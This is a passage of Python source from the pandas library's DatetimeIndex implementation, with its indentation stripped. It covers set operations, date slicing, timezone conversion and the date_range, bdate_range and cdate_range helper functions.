new_values = self._add_offset(delta).asi8
else:
new_values = self.astype('O') + delta
tz = 'UTC' if self.tz is not None else None
result = DatetimeIndex(new_values, tz=tz, name=name, freq='infer')
utc = _utc()
if self.tz is not None and self.tz is not utc:
result = result.tz_convert(self.tz)
return result
def _add_offset(self, offset):
try:
if self.tz is not None:
values = self.tz_localize(None)
else:
values = self
result = offset.apply_index(values)
if self.tz is not None:
result = result.tz_localize(self.tz)
return result
except NotImplementedError:
warnings.warn("Non-vectorized DateOffset being applied to Series "
"or DatetimeIndex", PerformanceWarning)
return self.astype('O') + offset
def _format_native_types(self, na_rep='NaT', date_format=None, **kwargs):
from pandas.formats.format import _get_format_datetime64_from_values
format = _get_format_datetime64_from_values(self, date_format)
return tslib.format_array_from_datetime(self.asi8,
tz=self.tz,
format=format,
na_rep=na_rep)
def to_datetime(self, dayfirst=False):
return self.copy()
@Appender(_index_shared_docs['astype'])
def astype(self, dtype, copy=True):
dtype = pandas_dtype(dtype)
if is_object_dtype(dtype):
return self.asobject
elif is_integer_dtype(dtype):
return Index(self.values.astype('i8', copy=copy), name=self.name,
dtype='i8')
elif is_datetime64_ns_dtype(dtype):
if self.tz is not None:
return self.tz_convert('UTC').tz_localize(None)
elif copy is True:
return self.copy()
return self
elif is_string_dtype(dtype):
return Index(self.format(), name=self.name, dtype=object)
elif is_period_dtype(dtype):
return self.to_period(freq=dtype.freq)
raise ValueError('Cannot cast DatetimeIndex to dtype %s' % dtype)
def _get_time_micros(self):
utc = _utc()
values = self.asi8
if self.tz is not None and self.tz is not utc:
values = self._local_timestamps()
return tslib.get_time_micros(values)
def to_series(self, keep_tz=False):
"""
Create a Series with both index and values equal to the index keys
useful with map for returning an indexer based on an index
Parameters
----------
keep_tz : optional, defaults False.
return the data keeping the timezone.
If keep_tz is True:
If the timezone is not set, the resulting
Series will have a datetime64[ns] dtype.
Otherwise the Series will have an datetime64[ns, tz] dtype; the
tz will be preserved.
If keep_tz is False:
Series will have a datetime64[ns] dtype. TZ aware
objects will have the tz removed.
Returns
-------
Series
"""
from pandas import Series
return Series(self._to_embed(keep_tz), index=self, name=self.name)
def _to_embed(self, keep_tz=False):
"""
return an array repr of this object, potentially casting to object
This is for internal compat
"""
if keep_tz and self.tz is not None:
# preserve the tz & copy
return self.copy(deep=True)
return self.values.copy()
def to_pydatetime(self):
"""
Return DatetimeIndex as object ndarray of datetime.datetime objects
Returns
-------
datetimes : ndarray
"""
return tslib.ints_to_pydatetime(self.asi8, tz=self.tz)
def to_period(self, freq=None):
"""
Cast to PeriodIndex at a particular frequency
"""
from pandas.tseries.period import PeriodIndex
if freq is None:
freq = self.freqstr or self.inferred_freq
if freq is None:
msg = ("You must pass a freq argument as "
"current index has none.")
raise ValueError(msg)
freq = get_period_alias(freq)
return PeriodIndex(self.values, name=self.name, freq=freq, tz=self.tz)
def snap(self, freq='S'):
"""
Snap time stamps to nearest occurring frequency
"""
# Superdumb, punting on any optimizing
freq = to_offset(freq)
snapped = np.empty(len(self), dtype=_NS_DTYPE)
for i, v in enumerate(self):
s = v
if not freq.onOffset(s):
t0 = freq.rollback(s)
t1 = freq.rollforward(s)
if abs(s - t0) < abs(t1 - s):
s = t0
else:
s = t1
snapped[i] = s
# we know it conforms; skip check
return DatetimeIndex(snapped, freq=freq, verify_integrity=False)
def union(self, other):
"""
Specialized union for DatetimeIndex objects. If combine
overlapping ranges with the same DateOffset, will be much
faster than Index.union
Parameters
----------
other : DatetimeIndex or array-like
Returns
-------
y : Index or DatetimeIndex
"""
self._assert_can_do_setop(other)
if not isinstance(other, DatetimeIndex):
try:
other = DatetimeIndex(other)
except TypeError:
pass
this, other = self._maybe_utc_convert(other)
if this._can_fast_union(other):
return this._fast_union(other)
else:
result = Index.union(this, other)
if isinstance(result, DatetimeIndex):
result.tz = this.tz
if (result.freq is None and
(this.freq is not None or other.freq is not None)):
result.offset = to_offset(result.inferred_freq)
return result
def to_perioddelta(self, freq):
"""
Calcuates TimedeltaIndex of difference between index
values and index converted to PeriodIndex at specified
freq. Used for vectorized offsets
.. versionadded:: 0.17.0
Parameters
----------
freq : Period frequency
Returns
-------
y : TimedeltaIndex
"""
return to_timedelta(self.asi8 - self.to_period(freq)
.to_timestamp().asi8)
def union_many(self, others):
"""
A bit of a hack to accelerate unioning a collection of indexes
"""
this = self
for other in others:
if not isinstance(this, DatetimeIndex):
this = Index.union(this, other)
continue
if not isinstance(other, DatetimeIndex):
try:
other = DatetimeIndex(other)
except TypeError:
pass
this, other = this._maybe_utc_convert(other)
if this._can_fast_union(other):
this = this._fast_union(other)
else:
tz = this.tz
this = Index.union(this, other)
if isinstance(this, DatetimeIndex):
this.tz = tz
if this.freq is None:
this.offset = to_offset(this.inferred_freq)
return this
def join(self, other, how='left', level=None, return_indexers=False):
"""
See Index.join
"""
if (not isinstance(other, DatetimeIndex) and len(other) > 0 and
other.inferred_type not in ('floating', 'mixed-integer',
'mixed-integer-float', 'mixed')):
try:
other = DatetimeIndex(other)
except (TypeError, ValueError):
pass
this, other = self._maybe_utc_convert(other)
return Index.join(this, other, how=how, level=level,
return_indexers=return_indexers)
def _maybe_utc_convert(self, other):
this = self
if isinstance(other, DatetimeIndex):
if self.tz is not None:
if other.tz is None:
raise TypeError('Cannot join tz-naive with tz-aware '
'DatetimeIndex')
elif other.tz is not None:
raise TypeError('Cannot join tz-naive with tz-aware '
'DatetimeIndex')
if self.tz != other.tz:
this = self.tz_convert('UTC')
other = other.tz_convert('UTC')
return this, other
def _wrap_joined_index(self, joined, other):
name = self.name if self.name == other.name else None
if (isinstance(other, DatetimeIndex) and
self.offset == other.offset and
self._can_fast_union(other)):
joined = self._shallow_copy(joined)
joined.name = name
return joined
else:
tz = getattr(other, 'tz', None)
return self._simple_new(joined, name, tz=tz)
def _can_fast_union(self, other):
if not isinstance(other, DatetimeIndex):
return False
offset = self.offset
if offset is None or offset != other.offset:
return False
if not self.is_monotonic or not other.is_monotonic:
return False
if len(self) == 0 or len(other) == 0:
return True
# to make our life easier, "sort" the two ranges
if self[0] <= other[0]:
left, right = self, other
else:
left, right = other, self
right_start = right[0]
left_end = left[-1]
# Only need to "adjoin", not overlap
try:
return (right_start == left_end + offset) or right_start in left
except (ValueError):
# if we are comparing an offset that does not propagate timezones
# this will raise
return False
def _fast_union(self, other):
if len(other) == 0:
return self.view(type(self))
if len(self) == 0:
return other.view(type(self))
# to make our life easier, "sort" the two ranges
if self[0] <= other[0]:
left, right = self, other
else:
left, right = other, self
left_start, left_end = left[0], left[-1]
right_end = right[-1]
if not self.offset._should_cache():
# concatenate dates
if left_end < right_end:
loc = right.searchsorted(left_end, side='right')
right_chunk = right.values[loc:]
dates = _concat._concat_compat((left.values, right_chunk))
return self._shallow_copy(dates)
else:
return left
else:
return type(self)(start=left_start,
end=max(left_end, right_end),
freq=left.offset)
def __iter__(self):
"""
Return an iterator over the boxed values
Returns
-------
Timestamps : ndarray
"""
# convert in chunks of 10k for efficiency
data = self.asi8
l = len(self)
chunksize = 10000
chunks = int(l / chunksize) + 1
for i in range(chunks):
start_i = i * chunksize
end_i = min((i + 1) * chunksize, l)
converted = tslib.ints_to_pydatetime(data[start_i:end_i],
tz=self.tz, freq=self.freq,
box=True)
for v in converted:
yield v
def _wrap_union_result(self, other, result):
name = self.name if self.name == other.name else None
if self.tz != other.tz:
raise ValueError('Passed item and index have different timezone')
return self._simple_new(result, name=name, freq=None, tz=self.tz)
def intersection(self, other):
"""
Specialized intersection for DatetimeIndex objects. May be much faster
than Index.intersection
Parameters
----------
other : DatetimeIndex or array-like
Returns
-------
y : Index or DatetimeIndex
"""
self._assert_can_do_setop(other)
if not isinstance(other, DatetimeIndex):
try:
other = DatetimeIndex(other)
except (TypeError, ValueError):
pass
result = Index.intersection(self, other)
if isinstance(result, DatetimeIndex):
if result.freq is None:
result.offset = to_offset(result.inferred_freq)
return result
elif (other.offset is None or self.offset is None or
other.offset != self.offset or
not other.offset.isAnchored() or
(not self.is_monotonic or not other.is_monotonic)):
result = Index.intersection(self, other)
if isinstance(result, DatetimeIndex):
if result.freq is None:
result.offset = to_offset(result.inferred_freq)
return result
if len(self) == 0:
return self
if len(other) == 0:
return other
# to make our life easier, "sort" the two ranges
if self[0] <= other[0]:
left, right = self, other
else:
left, right = other, self
end = min(left[-1], right[-1])
start = right[0]
if end < start:
return type(self)(data=[])
else:
lslice = slice(*left.slice_locs(start, end))
left_chunk = left.values[lslice]
return self._shallow_copy(left_chunk)
def _parsed_string_to_bounds(self, reso, parsed):
"""
Calculate datetime bounds for parsed time string and its resolution.
Parameters
----------
reso : Resolution
Resolution provided by parsed string.
parsed : datetime
Datetime from parsed string.
Returns
-------
lower, upper: pd.Timestamp
"""
if reso == 'year':
return (Timestamp(datetime(parsed.year, 1, 1), tz=self.tz),
Timestamp(datetime(parsed.year, 12, 31, 23,
59, 59, 999999), tz=self.tz))
elif reso == 'month':
d = tslib.monthrange(parsed.year, parsed.month)[1]
return (Timestamp(datetime(parsed.year, parsed.month, 1),
tz=self.tz),
Timestamp(datetime(parsed.year, parsed.month, d, 23,
59, 59, 999999), tz=self.tz))
elif reso == 'quarter':
qe = (((parsed.month - 1) + 2) % 12) + 1 # two months ahead
d = tslib.monthrange(parsed.year, qe)[1] # at end of month
return (Timestamp(datetime(parsed.year, parsed.month, 1),
tz=self.tz),
Timestamp(datetime(parsed.year, qe, d, 23, 59,
59, 999999), tz=self.tz))
elif reso == 'day':
st = datetime(parsed.year, parsed.month, parsed.day)
return (Timestamp(st, tz=self.tz),
Timestamp(Timestamp(st + offsets.Day(),
tz=self.tz).value - 1))
elif reso == 'hour':
st = datetime(parsed.year, parsed.month, parsed.day,
hour=parsed.hour)
return (Timestamp(st, tz=self.tz),
Timestamp(Timestamp(st + offsets.Hour(),
tz=self.tz).value - 1))
elif reso == 'minute':
st = datetime(parsed.year, parsed.month, parsed.day,
hour=parsed.hour, minute=parsed.minute)
return (Timestamp(st, tz=self.tz),
Timestamp(Timestamp(st + offsets.Minute(),
tz=self.tz).value - 1))
elif reso == 'second':
st = datetime(parsed.year, parsed.month, parsed.day,
hour=parsed.hour, minute=parsed.minute,
second=parsed.second)
return (Timestamp(st, tz=self.tz),
Timestamp(Timestamp(st + offsets.Second(),
tz=self.tz).value - 1))
elif reso == 'microsecond':
st = datetime(parsed.year, parsed.month, parsed.day,
parsed.hour, parsed.minute, parsed.second,
parsed.microsecond)
return (Timestamp(st, tz=self.tz), Timestamp(st, tz=self.tz))
else:
raise KeyError
def _partial_date_slice(self, reso, parsed, use_lhs=True, use_rhs=True):
is_monotonic = self.is_monotonic
if ((reso in ['day', 'hour', 'minute'] and
not (self._resolution < Resolution.get_reso(reso) or
not is_monotonic)) or
(reso == 'second' and
not (self._resolution <= Resolution.RESO_SEC or
not is_monotonic))):
# These resolution/monotonicity validations came from GH3931,
# GH3452 and GH2369.
raise KeyError
if reso == 'microsecond':
# _partial_date_slice doesn't allow microsecond resolution, but
# _parsed_string_to_bounds allows it.
raise KeyError
t1, t2 = self._parsed_string_to_bounds(reso, parsed)
stamps = self.asi8
if is_monotonic:
# we are out of range
if (len(stamps) and ((use_lhs and t1.value < stamps[0] and
t2.value < stamps[0]) or
((use_rhs and t1.value > stamps[-1] and
t2.value > stamps[-1])))):
raise KeyError
# a monotonic (sorted) series can be sliced
left = stamps.searchsorted(
t1.value, side='left') if use_lhs else None
right = stamps.searchsorted(
t2.value, side='right') if use_rhs else None
return slice(left, right)
lhs_mask = (stamps >= t1.value) if use_lhs else True
rhs_mask = (stamps <= t2.value) if use_rhs else True
# try to find a the dates
return (lhs_mask & rhs_mask).nonzero()[0]
def _possibly_promote(self, other):
if other.inferred_type == 'date':
other = DatetimeIndex(other)
return self, other
def get_value(self, series, key):
"""
Fast lookup of value from 1-dimensional ndarray. Only use this if you
know what you're doing
"""
if isinstance(key, datetime):
# needed to localize naive datetimes
if self.tz is not None:
key = Timestamp(key, tz=self.tz)
return self.get_value_maybe_box(series, key)
if isinstance(key, time):
locs = self.indexer_at_time(key)
return series.take(locs)
try:
return _maybe_box(self, Index.get_value(self, series, key),
series, key)
except KeyError:
try:
loc = self._get_string_slice(key)
return series[loc]
except (TypeError, ValueError, KeyError):
pass
try:
return self.get_value_maybe_box(series, key)
except (TypeError, ValueError, KeyError):
raise KeyError(key)
def get_value_maybe_box(self, series, key):
# needed to localize naive datetimes
if self.tz is not None:
key = Timestamp(key, tz=self.tz)
elif not isinstance(key, Timestamp):
key = Timestamp(key)
values = self._engine.get_value(_values_from_object(series),
key, tz=self.tz)
return _maybe_box(self, values, series, key)
def get_loc(self, key, method=None, tolerance=None):
"""
Get integer location for requested label
Returns
-------
loc : int
"""
if tolerance is not None:
# try converting tolerance now, so errors don't get swallowed by
# the try/except clauses below
tolerance = self._convert_tolerance(tolerance)
if isinstance(key, datetime):
# needed to localize naive datetimes
key = Timestamp(key, tz=self.tz)
return Index.get_loc(self, key, method, tolerance)
if isinstance(key, time):
if method is not None:
raise NotImplementedError('cannot yet lookup inexact labels '
'when key is a time object')
return self.indexer_at_time(key)
try:
return Index.get_loc(self, key, method, tolerance)
except (KeyError, ValueError, TypeError):
try:
return self._get_string_slice(key)
except (TypeError, KeyError, ValueError):
pass
try:
stamp = Timestamp(key, tz=self.tz)
return Index.get_loc(self, stamp, method, tolerance)
except (KeyError, ValueError):
raise KeyError(key)
def _maybe_cast_slice_bound(self, label, side, kind):
"""
If label is a string, cast it to datetime according to resolution.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
label : object
Notes
-----
Value of `side` parameter should be validated in caller.
"""
assert kind in ['ix', 'loc', 'getitem', None]
if is_float(label) or isinstance(label, time) or is_integer(label):
self._invalid_indexer('slice', label)
if isinstance(label, compat.string_types):
freq = getattr(self, 'freqstr',
getattr(self, 'inferred_freq', None))
_, parsed, reso = parse_time_string(label, freq)
lower, upper = self._parsed_string_to_bounds(reso, parsed)
# lower, upper form the half-open interval:
# [parsed, parsed + 1 freq)
# because label may be passed to searchsorted
# the bounds need swapped if index is reverse sorted and has a
# length (is_monotonic_decreasing gives True for empty index)
if self.is_monotonic_decreasing and len(self):
return upper if side == 'left' else lower
return lower if side == 'left' else upper
else:
return label
def _get_string_slice(self, key, use_lhs=True, use_rhs=True):
freq = getattr(self, 'freqstr',
getattr(self, 'inferred_freq', None))
_, parsed, reso = parse_time_string(key, freq)
loc = self._partial_date_slice(reso, parsed, use_lhs=use_lhs,
use_rhs=use_rhs)
return loc
def slice_indexer(self, start=None, end=None, step=None, kind=None):
"""
Return indexer for specified label slice.
Index.slice_indexer, customized to handle time slicing.
In addition to functionality provided by Index.slice_indexer, does the
following:
- if both `start` and `end` are instances of `datetime.time`, it
invokes `indexer_between_time`
- if `start` and `end` are both either string or None perform
value-based selection in non-monotonic cases.
"""
# For historical reasons DatetimeIndex supports slices between two
# instances of datetime.time as if it were applying a slice mask to
# an array of (self.hour, self.minute, self.seconds, self.microsecond).
if isinstance(start, time) and isinstance(end, time):
if step is not None and step != 1:
raise ValueError('Must have step size of 1 with time slices')
return self.indexer_between_time(start, end)
if isinstance(start, time) or isinstance(end, time):
raise KeyError('Cannot mix time and non-time slice keys')
try:
return Index.slice_indexer(self, start, end, step, kind=kind)
except KeyError:
# For historical reasons DatetimeIndex by default supports
# value-based partial (aka string) slices on non-monotonic arrays,
# let's try that.
if ((start is None or isinstance(start, compat.string_types)) and
(end is None or isinstance(end, compat.string_types))):
mask = True
if start is not None:
start_casted = self._maybe_cast_slice_bound(
start, 'left', kind)
mask = start_casted <= self
if end is not None:
end_casted = self._maybe_cast_slice_bound(
end, 'right', kind)
mask = (self <= end_casted) & mask
indexer = mask.nonzero()[0][::step]
if len(indexer) == len(self):
return slice(None)
else:
return indexer
else:
raise
# alias to offset
def _get_freq(self):
return self.offset
def _set_freq(self, value):
self.offset = value
freq = property(fget=_get_freq, fset=_set_freq,
doc="get/set the frequncy of the Index")
year = _field_accessor('year', 'Y', "The year of the datetime")
month = _field_accessor('month', 'M',
"The month as January=1, December=12")
day = _field_accessor('day', 'D', "The days of the datetime")
hour = _field_accessor('hour', 'h', "The hours of the datetime")
minute = _field_accessor('minute', 'm', "The minutes of the datetime")
second = _field_accessor('second', 's', "The seconds of the datetime")
microsecond = _field_accessor('microsecond', 'us',
"The microseconds of the datetime")
nanosecond = _field_accessor('nanosecond', 'ns',
"The nanoseconds of the datetime")
weekofyear = _field_accessor('weekofyear', 'woy',
"The week ordinal of the year")
week = weekofyear
dayofweek = _field_accessor('dayofweek', 'dow',
"The day of the week with Monday=0, Sunday=6")
weekday = dayofweek
weekday_name = _field_accessor(
'weekday_name',
'weekday_name',
"The name of day in a week (ex: Friday)\n\n.. versionadded:: 0.18.1")
dayofyear = _field_accessor('dayofyear', 'doy',
"The ordinal day of the year")
quarter = _field_accessor('quarter', 'q', "The quarter of the date")
days_in_month = _field_accessor(
'days_in_month',
'dim',
"The number of days in the month\n\n.. versionadded:: 0.16.0")
daysinmonth = days_in_month
is_month_start = _field_accessor(
'is_month_start',
'is_month_start',
"Logical indicating if first day of month (defined by frequency)")
is_month_end = _field_accessor(
'is_month_end',
'is_month_end',
"Logical indicating if last day of month (defined by frequency)")
is_quarter_start = _field_accessor(
'is_quarter_start',
'is_quarter_start',
"Logical indicating if first day of quarter (defined by frequency)")
is_quarter_end = _field_accessor(
'is_quarter_end',
'is_quarter_end',
"Logical indicating if last day of quarter (defined by frequency)")
is_year_start = _field_accessor(
'is_year_start',
'is_year_start',
"Logical indicating if first day of year (defined by frequency)")
is_year_end = _field_accessor(
'is_year_end',
'is_year_end',
"Logical indicating if last day of year (defined by frequency)")
is_leap_year = _field_accessor(
'is_leap_year',
'is_leap_year',
"Logical indicating if the date belongs to a leap year")
@property
def time(self):
"""
Returns numpy array of datetime.time. The time part of the Timestamps.
"""
return self._maybe_mask_results(_algos.arrmap_object(
self.asobject.values,
lambda x: np.nan if x is tslib.NaT else x.time()))
@property
def date(self):
"""
Returns numpy array of python datetime.date objects (namely, the date
part of Timestamps without timezone information).
"""
return self._maybe_mask_results(_algos.arrmap_object(
self.asobject.values, lambda x: x.date()))
def normalize(self):
"""
Return DatetimeIndex with times to midnight. Length is unaltered
Returns
-------
normalized : DatetimeIndex
"""
new_values = tslib.date_normalize(self.asi8, self.tz)
return DatetimeIndex(new_values, freq='infer', name=self.name,
tz=self.tz)
@Substitution(klass='DatetimeIndex', value='key')
@Appender(_shared_docs['searchsorted'])
def searchsorted(self, key, side='left', sorter=None):
if isinstance(key, (np.ndarray, Index)):
key = np.array(key, dtype=_NS_DTYPE, copy=False)
else:
key = _to_m8(key, tz=self.tz)
return self.values.searchsorted(key, side=side)
def is_type_compatible(self, typ):
return typ == self.inferred_type or typ == 'datetime'
@property
def inferred_type(self):
# b/c datetime is represented as microseconds since the epoch, make
# sure we can't have ambiguous indexing
return 'datetime64'
@cache_readonly
def dtype(self):
if self.tz is None:
return _NS_DTYPE
return DatetimeTZDtype('ns', self.tz)
@property
def is_all_dates(self):
return True
@cache_readonly
def is_normalized(self):
"""
Returns True if all of the dates are at midnight ("no time")
"""
return tslib.dates_normalized(self.asi8, self.tz)
@cache_readonly
def _resolution(self):
return period.resolution(self.asi8, self.tz)
def insert(self, loc, item):
"""
Make new Index inserting new item at location
Parameters
----------
loc : int
item : object
if not either a Python datetime or a numpy integer-like, returned
Index dtype will be object rather than datetime.
Returns
-------
new_index : Index
"""
freq = None
if isinstance(item, (datetime, np.datetime64)):
self._assert_can_do_op(item)
if not self._has_same_tz(item):
raise ValueError(
'Passed item and index have different timezone')
# check freq can be preserved on edge cases
if self.size and self.freq is not None:
if ((loc == 0 or loc == -len(self)) and
item + self.freq == self[0]):
freq = self.freq
elif (loc == len(self)) and item - self.freq == self[-1]:
freq = self.freq
item = _to_m8(item, tz=self.tz)
try:
new_dates = np.concatenate((self[:loc].asi8, [item.view(np.int64)],
self[loc:].asi8))
if self.tz is not None:
new_dates = tslib.tz_convert(new_dates, 'UTC', self.tz)
return DatetimeIndex(new_dates, name=self.name, freq=freq,
tz=self.tz)
except (AttributeError, TypeError):
# fall back to object index
if isinstance(item, compat.string_types):
return self.asobject.insert(loc, item)
raise TypeError(
"cannot insert DatetimeIndex with incompatible label")
def delete(self, loc):
"""
Make a new DatetimeIndex with passed location(s) deleted.
Parameters
----------
loc: int, slice or array of ints
Indicate which sub-arrays to remove.
Returns
-------
new_index : DatetimeIndex
"""
new_dates = np.delete(self.asi8, loc)
freq = None
if is_integer(loc):
if loc in (0, -len(self), -1, len(self) - 1):
freq = self.freq
else:
if is_list_like(loc):
loc = lib.maybe_indices_to_slice(
_ensure_int64(np.array(loc)), len(self))
if isinstance(loc, slice) and loc.step in (1, None):
if (loc.start in (0, None) or loc.stop in (len(self), None)):
freq = self.freq
if self.tz is not None:
new_dates = tslib.tz_convert(new_dates, 'UTC', self.tz)
return DatetimeIndex(new_dates, name=self.name, freq=freq, tz=self.tz)
def tz_convert(self, tz):
"""
Convert tz-aware DatetimeIndex from one time zone to another (using
pytz/dateutil)
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding UTC time.
Returns
-------
normalized : DatetimeIndex
Raises
------
TypeError
If DatetimeIndex is tz-naive.
"""
tz = tslib.maybe_get_tz(tz)
if self.tz is None:
# tz naive, use tz_localize
raise TypeError('Cannot convert tz-naive timestamps, use '
'tz_localize to localize')
# No conversion since timestamps are all UTC to begin with
return self._shallow_copy(tz=tz)
@deprecate_kwarg(old_arg_name='infer_dst', new_arg_name='ambiguous',
mapping={True: 'infer', False: 'raise'})
def tz_localize(self, tz, ambiguous='raise', errors='raise'):
"""
Localize tz-naive DatetimeIndex to given time zone (using
pytz/dateutil), or remove timezone from tz-aware DatetimeIndex
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding local time.
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False signifies a
non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times
errors : 'raise', 'coerce', default 'raise'
- 'raise' will raise a NonExistentTimeError if a timestamp is not
valid in the specified timezone (e.g. due to a transition from
or to DST time)
- 'coerce' will return NaT if the timestamp can not be converted
into the specified timezone
.. versionadded:: 0.19.0
infer_dst : boolean, default False (DEPRECATED)
Attempt to infer fall dst-transition hours based on order
Returns
-------
localized : DatetimeIndex
Raises
------
TypeError
If the DatetimeIndex is tz-aware and tz is not None.
"""
if self.tz is not None:
if tz is None:
new_dates = tslib.tz_convert(self.asi8, 'UTC', self.tz)
else:
raise TypeError("Already tz-aware, use tz_convert to convert.")
else:
tz = tslib.maybe_get_tz(tz)
# Convert to UTC
new_dates = tslib.tz_localize_to_utc(self.asi8, tz,
ambiguous=ambiguous,
errors=errors)
new_dates = new_dates.view(_NS_DTYPE)
return self._shallow_copy(new_dates, tz=tz)
def indexer_at_time(self, time, asof=False):
"""
Select values at particular time of day (e.g. 9:30AM)
Parameters
----------
time : datetime.time or string
Returns
-------
values_at_time : TimeSeries
"""
from dateutil.parser import parse
if asof:
raise NotImplementedError("'asof' argument is not supported")
if isinstance(time, compat.string_types):
time = parse(time).time()
if time.tzinfo:
# TODO
raise NotImplementedError("argument 'time' with timezone info is "
"not supported")
time_micros = self._get_time_micros()
micros = _time_to_micros(time)
return (micros == time_micros).nonzero()[0]
def indexer_between_time(self, start_time, end_time, include_start=True,
include_end=True):
"""
Select values between particular times of day (e.g., 9:00-9:30AM).
Return values of the index between two times. If start_time or
end_time are strings then tseres.tools.to_time is used to convert to
a time object.
Parameters
----------
start_time, end_time : datetime.time, str
datetime.time or string in appropriate format ("%H:%M", "%H%M",
"%I:%M%p", "%I%M%p", "%H:%M:%S", "%H%M%S", "%I:%M:%S%p",
"%I%M%S%p")
include_start : boolean, default True
include_end : boolean, default True
Returns
-------
values_between_time : TimeSeries
"""
start_time = to_time(start_time)
end_time = to_time(end_time)
time_micros = self._get_time_micros()
start_micros = _time_to_micros(start_time)
end_micros = _time_to_micros(end_time)
if include_start and include_end:
lop = rop = operator.le
elif include_start:
lop = operator.le
rop = operator.lt
elif include_end:
lop = operator.lt
rop = operator.le
else:
lop = rop = operator.lt
if start_time <= end_time:
join_op = operator.and_
else:
join_op = operator.or_
mask = join_op(lop(start_micros, time_micros),
rop(time_micros, end_micros))
return mask.nonzero()[0]
def to_julian_date(self):
"""
Convert DatetimeIndex to Float64Index of Julian Dates.
0 Julian date is noon January 1, 4713 BC.
http://en.wikipedia.org/wiki/Julian_day
"""
# http://mysite.verizon.net/aesir_research/date/jdalg2.htm
year = self.year
month = self.month
day = self.day
testarr = month < 3
year[testarr] -= 1
month[testarr] += 12
return Float64Index(day +
np.fix((153 * month - 457) / 5) +
365 * year +
np.floor(year / 4) -
np.floor(year / 100) +
np.floor(year / 400) +
1721118.5 +
(self.hour +
self.minute / 60.0 +
self.second / 3600.0 +
self.microsecond / 3600.0 / 1e+6 +
self.nanosecond / 3600.0 / 1e+9
) / 24.0)
DatetimeIndex._add_numeric_methods_disabled()
DatetimeIndex._add_logical_methods_disabled()
DatetimeIndex._add_datetimelike_methods()
def _generate_regular_range(start, end, periods, offset):
if isinstance(offset, Tick):
stride = offset.nanos
if periods is None:
b = Timestamp(start).value
# cannot just use e = Timestamp(end) + 1 because arange breaks when
# stride is too large, see GH10887
e = (b + (Timestamp(end).value - b) // stride * stride +
stride // 2 + 1)
# end.tz == start.tz by this point due to _generate implementation
tz = start.tz
elif start is not None:
b = Timestamp(start).value
e = b + np.int64(periods) * stride
tz = start.tz
elif end is not None:
e = Timestamp(end).value + stride
b = e - np.int64(periods) * stride
tz = end.tz
else:
raise ValueError("at least 'start' or 'end' should be specified "
"if a 'period' is given.")
data = np.arange(b, e, stride, dtype=np.int64)
data = DatetimeIndex._simple_new(data, None, tz=tz)
else:
if isinstance(start, Timestamp):
start = start.to_pydatetime()
if isinstance(end, Timestamp):
end = end.to_pydatetime()
xdr = generate_range(start=start, end=end,
periods=periods, offset=offset)
dates = list(xdr)
# utc = len(dates) > 0 and dates[0].tzinfo is not None
data = tools.to_datetime(dates)
return data
def date_range(start=None, end=None, periods=None, freq='D', tz=None,
normalize=False, name=None, closed=None, **kwargs):
"""
Return a fixed frequency datetime index, with day (calendar) as the default
frequency
Parameters
----------
start : string or datetime-like, default None
Left bound for generating dates
end : string or datetime-like, default None
Right bound for generating dates
periods : integer or None, default None
If None, must specify start and end
freq : string or DateOffset, default 'D' (calendar daily)
Frequency strings can have multiples, e.g. '5H'
tz : string or None
Time zone name for returning localized DatetimeIndex, for example
Asia/Hong_Kong
normalize : bool, default False
Normalize start/end dates to midnight before generating date range
name : str, default None
Name of the resulting index
closed : string or None, default None
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None)
Notes
-----
2 of start, end, or periods must be specified
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Returns
-------
rng : DatetimeIndex
"""
return DatetimeIndex(start=start, end=end, periods=periods,
freq=freq, tz=tz, normalize=normalize, name=name,
closed=closed, **kwargs)
def bdate_range(start=None, end=None, periods=None, freq='B', tz=None,
normalize=True, name=None, closed=None, **kwargs):
"""
Return a fixed frequency datetime index, with business day as the default
frequency
Parameters
----------
start : string or datetime-like, default None
Left bound for generating dates
end : string or datetime-like, default None
Right bound for generating dates
periods : integer or None, default None
If None, must specify start and end
freq : string or DateOffset, default 'B' (business daily)
Frequency strings can have multiples, e.g. '5H'
tz : string or None
Time zone name for returning localized DatetimeIndex, for example
Asia/Beijing
normalize : bool, default False
Normalize start/end dates to midnight before generating date range
name : str, default None
Name for the resulting index
closed : string or None, default None
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None)
Notes
-----
2 of start, end, or periods must be specified
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Returns
-------
rng : DatetimeIndex
"""
return DatetimeIndex(start=start, end=end, periods=periods,
freq=freq, tz=tz, normalize=normalize, name=name,
closed=closed, **kwargs)
def cdate_range(start=None, end=None, periods=None, freq='C', tz=None,
normalize=True, name=None, closed=None, **kwargs):
"""
**EXPERIMENTAL** Return a fixed frequency datetime index, with
CustomBusinessDay as the default frequency
.. warning:: EXPERIMENTAL
The CustomBusinessDay class is not officially supported and the API is
likely to change in future versions. Use this at your own risk.
Parameters
----------
start : string or datetime-like, default None
Left bound for generating dates
end : string or datetime-like, default None
Right bound for generating dates
periods : integer or None, default None
If None, must specify start and end
freq : string or DateOffset, default 'C' (CustomBusinessDay)
Frequency strings can have multiples, e.g. '5H'
tz : string or None
Time zone name for returning localized DatetimeIndex, for example
Asia/Beijing
normalize : bool, default False
Normalize start/end dates to midnight before generating date range
name : str, default None
Name for the resulting index
weekmask : str, Default 'Mon Tue Wed Thu Fri'
weekmask of valid business days, passed to ``numpy.busdaycalendar``
holidays : list
list/array of dates to exclude from the set of valid business days,
passed to ``numpy.busdaycalendar``
closed : string or None, default None
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None)
Notes
-----
2 of start, end, or periods must be specified
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Returns
-------
rng : DatetimeIndex
"""
if freq == 'C':
holidays = kwargs.pop('holidays', [])
